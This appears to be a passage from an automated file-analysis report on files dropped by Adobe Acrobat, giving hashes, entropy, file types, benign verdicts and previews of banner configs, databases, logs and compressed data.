                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):289
                                                                                                        Entropy (8bit):5.3264844971872805
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXXydHxjx6mJ0YifDDoAvJfYdPeUkwRe9:YvXKXXmRjx6mWrsGg8Ukee9
                                                                                                        MD5:078C0C41104DE8C80C23545C6BC2D3A7
                                                                                                        SHA1:1728C99FA33FDDDFF99EA43782CE2043CB75ABFC
                                                                                                        SHA-256:4F233C2B4E532A9CC13BB131D6F383BA35E7808B8B8B25E04870B530C7AD81FC
                                                                                                        SHA-512:FCDF4E3604723CCC67E428056366A2244A5D19CEBB0F6BD56452C7ECDCD23CC0BAD1AAA300D486E1525E2C16BE93C178A141AD0DA4DF88A27821989DD8D47C07
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"76ed20c8-077b-4210-9684-b405390d5d15","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1736612978469,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):284
                                                                                                        Entropy (8bit):5.313001146369085
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXXydHxjx6mJ0YifDDoAvJf+dPeUkwRe9:YvXKXXmRjx6mWrsG28Ukee9
                                                                                                        MD5:0F5D8B0C3F1754A556BCA0D2C6175FD5
                                                                                                        SHA1:A58D9A78B8E419A8257C96E2B1C0984F1A59733A
                                                                                                        SHA-256:620B4F09E62C928ECB8C1C823D1A9B0B26C61B01DC61994313AB06277641E5BC
                                                                                                        SHA-512:AAB20E23510801E79643FFF1E0AC94DD91B34BD743D68BE2355DE30D4EBE884DF7CEC8DF2CC8C39FF7ABCB48FCD7ABFF77EDDEBEE7605D41604DF3A97757948C
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"76ed20c8-077b-4210-9684-b405390d5d15","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1736612978469,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):291
                                                                                                        Entropy (8bit):5.3098495708254925
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXXydHxjx6mJ0YifDDoAvJfbPtdPeUkwRe9:YvXKXXmRjx6mWrsGDV8Ukee9
                                                                                                        MD5:31FFEF27A568D1F1E6300DFBA34BDAB0
                                                                                                        SHA1:FAED7670FA04841CAD7369342A84D67D9A9F4C12
                                                                                                        SHA-256:4E0907F79FC5E6735957589A6C51A8D168132A88A454D04B1FDB38C83B861D65
                                                                                                        SHA-512:74D4BE2845BE24A3A0866EE1632CCA54EA4F1C499E971E7583B01DDDBD8F7E35D7C4A03C11C8E145E3B4DC0A2D42BC82075B88B08464BB84A30ACC42230FAE49
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"76ed20c8-077b-4210-9684-b405390d5d15","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1736612978469,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):287
                                                                                                        Entropy (8bit):5.3112396250101455
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXXydHxjx6mJ0YifDDoAvJf21rPeUkwRe9:YvXKXXmRjx6mWrsG+16Ukee9
                                                                                                        MD5:45EDF4362E4A9A16A9AD4281C694DD8D
                                                                                                        SHA1:8DFF7BD692AF5906BCE81D38EF3EB39D28ADEC27
                                                                                                        SHA-256:3529F807F24F94472B63D4824B36FAC4EDBF4C9FAEA3AAB48412F1AF482EB6C2
                                                                                                        SHA-512:D701D9D2363F206AE38CEB60F666879315F19F2EE7B614BA44BFBEB64292AE4C880B2834BFA7974B3C02615D5F257C00BEB77E9EE690C9F3D1AD60CD1240203F
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"76ed20c8-077b-4210-9684-b405390d5d15","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1736612978469,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1090
                                                                                                        Entropy (8bit):5.670342292925526
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Yv6XXmRd6pr5amXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSaS:Yv+c8prFBgkDMUJUAh8cvMB
                                                                                                        MD5:6618E7D1F78A5B338CE4DDA2A73EDB3E
                                                                                                        SHA1:B2F1BE3567CE53818FC899218E4CDEDDF93D8D49
                                                                                                        SHA-256:506C35EB23D2F3E73C93228AB14615D017308E5BE626A72318DC4429661EA041
                                                                                                        SHA-512:5081F8A2D8189771EC201AB6AAE99D373453BA9D074DBAD4A2E9AFE8AE3A2A96D045A74194BBBD4E88C9882B24A3F0C6CD686B056FFF7C582C1F92D9B896823B
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"76ed20c8-077b-4210-9684-b405390d5d15","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1736612978469,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):286
                                                                                                        Entropy (8bit):5.2864719884976585
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXXydHxjx6mJ0YifDDoAvJfshHHrPeUkwRe9:YvXKXXmRjx6mWrsGUUUkee9
                                                                                                        MD5:31C0885603E9CA3F5033586F97D9C4B9
                                                                                                        SHA1:531B922F0F8AF6C51E223C4F3235658E4D69923A
                                                                                                        SHA-256:BC6DEBA0AAEE3D2B3C56F0995E87EE40E3E8F45EF6363207DC5846C1F83E08CA
                                                                                                        SHA-512:640B4FB48DFFD179189C6D9DC001F887CEA74413152B312F5EB895B02D82FF85E75BFFC6D3EC49EF73BC897DECDE065BB80DCC275FE8623DBCBE64B26AE61ED9
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"76ed20c8-077b-4210-9684-b405390d5d15","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1736612978469,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):282
                                                                                                        Entropy (8bit):5.289445389921524
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXXydHxjx6mJ0YifDDoAvJTqgFCrPeUkwRe9:YvXKXXmRjx6mWrsGTq16Ukee9
                                                                                                        MD5:99BBD1AC3BB3C89AC5AAC44191F055FE
                                                                                                        SHA1:7A1663ABE6F0FDAF768048B68A3D353B263CCAB5
                                                                                                        SHA-256:7A707947C7431F8609B8CED093A7EBCBDF626E53B654CF90E8DC82766F9A5348
                                                                                                        SHA-512:2F195E027E85D1B6C232A111CA864D9278EDA6B6F416C8FD2D064A3F91C6AB7ED5E6F38076AF64147A3B0448A9FE495B905FC53D9F8178D931EAB70D36E18A8D
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"76ed20c8-077b-4210-9684-b405390d5d15","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1736612978469,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4
                                                                                                        Entropy (8bit):0.8112781244591328
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:e:e
                                                                                                        MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                        SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                        SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                        SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                        Malicious:false
                                                                                                        Preview:....
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2814
                                                                                                        Entropy (8bit):5.130166799524785
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Y9IHS4av0nayTgXwW4GjnXRc4z5mVjnwGsj0Swa02Ch2LS6CNRO4anA5AyqT53ok:YCH03Pjnyy5gX+AdoQAnAS6X96
                                                                                                        MD5:AA94ED7A99ACB1565C9A41D5F29C52FD
                                                                                                        SHA1:B5511D9381491174DC3626C87C2E82AB5CF534A6
                                                                                                        SHA-256:45835EB53416BD219DEFD82D3E34E80697F810F626BE6C01AF6641957135B839
                                                                                                        SHA-512:71B22F264837463D3C243E7CE6A0968FD5B0D270A0D37FB5C2692D23084CA125F21D92E0D5B07E6453ECD93075CDFDB9305E17762092DEC4310E74C03FA06573
                                                                                                        Malicious:false
                                                                                                        Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"b4af1f4d213baa322ae1223f0ec8e799","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1736439473000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"03f9965c316e2ad89bfc6ea67b7d56fc","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736439473000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"2401d7a776feaea9871759950f490713","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736439473000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"eaeead6aea9df349d71b58717310d049","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736439473000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"4dabc91bed7d5a446d649635100695f3","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1736439473000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"3cc1fe10456282ffe1abe3e93c90fd3c","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 23, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 23
                                                                                                        Category:dropped
                                                                                                        Size (bytes):12288
                                                                                                        Entropy (8bit):1.3577858905119213
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:TVl2GL7msncRVbjVpOV6cV6+VZeVZvVZCVZW/Vk/Vhjv2ubCs22LIi5BvPoU:vVmssZnrFHYtgU
                                                                                                        MD5:6E917A74940195B79DF5B5F6C5F998CD
                                                                                                        SHA1:7CDFE56E90F003E5C0CBF1DA415840DF4CF9F078
                                                                                                        SHA-256:D7A85B824BCC40DD07DB55F74D3F1AEBC5231A8F4D02740A544ADE8776C1CF9B
                                                                                                        SHA-512:CF2B0C618A07EEC65D0EF7A5DB480E05BC8E33F9C404A2971E4E73E32FC866B87573B053B2E8F328DD4E69CBA1B0839AB365EDC97AECBD26C8009ED8030AC7B9
                                                                                                        Malicious:false
                                                                                                        Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:SQLite Rollback Journal
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8720
                                                                                                        Entropy (8bit):1.8322368845737593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:7MYWcRVbjVpOV6cV6+VZeVZvVZCVZW/Vk/Vhjv2ubCs22LILBvPxc/qll2GL7msC:7JZnrFHLtOqVmsC
                                                                                                        MD5:618C701C803054EBD2B7B0B22157E0F0
                                                                                                        SHA1:016E456E7796058024C2040B78D224E7039CE907
                                                                                                        SHA-256:923BC473BC12CC908A17A04D003D69E3B2EE4ECC927503DD6251566EEF147E20
                                                                                                        SHA-512:05C0FB873FC4EC4B0A0DB03571E6C7D1F7BA4696D8BDC71DE541407D00332A215A5A5D02455F30F5C7D4DEB6AD0846BFB2D29BE704E256E148AFCF18F61EC3FF
                                                                                                        Malicious:false
                                                                                                        Preview:.... .c......J.M......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................v.../.././././.-.-.-.-.-.-.-.-.-.-.-.-.-.-........................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):66726
                                                                                                        Entropy (8bit):5.392739213842091
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:RNOpblrU6TBH44ADKZEgpPxv6JF3zfx+U0erjLgimUeQ626Yyu:6a6TZ44ADERxiF3zfx+em66HK
                                                                                                        MD5:1BC9240D6911EB1A1F1AF29CB0D5F098
                                                                                                        SHA1:3FDCFC198680EA5CB0D7B876D6900D72E60ED97F
                                                                                                        SHA-256:2E1F9624D881F822322DAC210182E443F1F086F677DB2BDC970217F9BB8CA531
                                                                                                        SHA-512:EA10CCF598C5A37A05840581558AFA78C33FB1AF57B6AABD64C7F17ABC674E1AF17931C6B1C693B35BA82C7C1626A702AC865D219A92A5F522586B75BFEC6B64
                                                                                                        Malicious:false
                                                                                                        Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):246
                                                                                                        Entropy (8bit):3.5024069929195045
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K88RQClEVw:Qw946cPbiOxDlbYnuRKLQDVw
                                                                                                        MD5:558C4FE2D8BDB12B9C2D0C9FB462094A
                                                                                                        SHA1:0E43D6400011156AC151D25475B10663F860E969
                                                                                                        SHA-256:55A5FEF5FB3316725E433E89F2AE7FC1F331335542952E028FB4757D99D672BA
                                                                                                        SHA-512:D1CDE5F21AB558616F81AE0612A9CB462586014AA67033290B3DED61125B0CFDECED62D24E6B107D8CFA5676A578A7E5E9F077886DFD3FD69906F7F63E7AB2DA
                                                                                                        Malicious:false
                                                                                                        Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.9./.0.1./.2.0.2.5. . .1.1.:.1.7.:.5.5. .=.=.=.....
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:ASCII text, with very long lines (393)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):16525
                                                                                                        Entropy (8bit):5.359827924713262
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:yNDmLJAZYTtvEcrd/GVMimVRMTzpCeb9sJVPbvHktuFKr4Bnk2DfNSNq8iwyhZ9u:bAPaRH9E3/
                                                                                                        MD5:06DEAEDB81D09FD8FB5FF668D8E09CB2
                                                                                                        SHA1:28A02BCBD5975117B97A08AFB049F2C94F334726
                                                                                                        SHA-256:D98DE785425112A2D7A41B16073812FA4FA4955F2D5139AE87C9A5FBC4717D64
                                                                                                        SHA-512:948E3B56E5A8D818A5FE9D74B82A898F7264909ADF2C49E5D096CB90F4D28ED95990545A4857933F0E06D493AA0F6D41F6109C74B44BC0E4B84346B519681936
                                                                                                        Malicious:false
                                                                                                        Preview:SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:755+0200 ThreadID=6536 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:756+0200 ThreadID=6536 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:756+0200 ThreadID=6536 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:756+0200 ThreadID=6536 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:756+0200 ThreadID=6536 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):15114
                                                                                                        Entropy (8bit):5.347131294575742
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:HRJ0d0q0N0d0e0og0i0v03l0lCaFOCdOUfxm0mKxsxy6t6d6o6l6AKwEwswuRS30:HvsxEGr5gjceCw01dbJDvG8GSD0WHPt/
                                                                                                        MD5:336C9C815CF4B258D7196115B3E1B5A0
                                                                                                        SHA1:FE393F7A6436A107D39EE1806218E616F2DAB5CA
                                                                                                        SHA-256:BBB7A705DC2AC742A0325C6FC9B1F419A3EF732B77440303FA193EE650193496
                                                                                                        SHA-512:4464F482780DAD72C2FB6231143D05DD1208EBA20D6281A217D540395424755D2C120C4DA94532C5A50974F45EE7C6A1B4C1DC7966E09E5897E87A5BB47FB999
                                                                                                        Malicious:false
                                                                                                        Preview:SessionID=a2a3059a-3dda-4c80-a984-81eb7092ae6b.1736439470514 Timestamp=2025-01-09T11:17:50:514-0500 ThreadID=6676 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=a2a3059a-3dda-4c80-a984-81eb7092ae6b.1736439470514 Timestamp=2025-01-09T11:17:50:519-0500 ThreadID=6676 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=a2a3059a-3dda-4c80-a984-81eb7092ae6b.1736439470514 Timestamp=2025-01-09T11:17:50:519-0500 ThreadID=6676 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=a2a3059a-3dda-4c80-a984-81eb7092ae6b.1736439470514 Timestamp=2025-01-09T11:17:50:519-0500 ThreadID=6676 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=a2a3059a-3dda-4c80-a984-81eb7092ae6b.1736439470514 Timestamp=2025-01-09T11:17:50:520-0500 ThreadID=6676 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):35721
                                                                                                        Entropy (8bit):5.4231125053109475
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:fcbmI6ccb9cb+IqccbdcbIIl3cbXcbWIS+cb4cbIIJzcbEndd5EJepWyPwnmpwnZ:g6sqGlVS/J9Wn
                                                                                                        MD5:3B5E1DBFF91CA746FDAB2B212F9B1B02
                                                                                                        SHA1:63520DB696485F7D4A1F91DF2DF5200FB4AB8A4B
                                                                                                        SHA-256:E581939E724DF75CA5B5431A4E0EC8A00C29CEA29790064D3762FC1351C1CE2C
                                                                                                        SHA-512:C1D78D27642597D61436DA1602D2216BCBB84C69FB51D8E40E84718814974B95B34D083C6F7C8E45E9745BD2AF014D96717C632C796A2C1D60090FF05CB4692E
                                                                                                        Malicious:false
                                                                                                        Preview:06-10-2023 11:44:59:.---2---..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 11:44:59:.Closing File..06-10-
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1407294
                                                                                                        Entropy (8bit):7.97605879016224
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZ7wYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs03WLaGZw
                                                                                                        MD5:8B9FA2EC5118087D19CFDB20DA7C4C26
                                                                                                        SHA1:E32D6A1829B18717EF1455B73E88D36E0410EF93
                                                                                                        SHA-256:4782624EA3A4B3C6EB782689208148B636365AA8E5DAF00814FA9AB722259CBD
                                                                                                        SHA-512:662F8664CC3F4E8356D5F5794074642DB65565D40AC9FEA323E16E84EBD4F961701460A1310CC863D1AB38849E84E2142382F5DB88A0E53F97FF66248230F7B9
                                                                                                        Malicious:false
                                                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                                        Category:dropped
                                                                                                        Size (bytes):386528
                                                                                                        Entropy (8bit):7.9736851559892425
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                                        MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                                        SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                                        SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                                        SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                                        Malicious:false
                                                                                                        Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
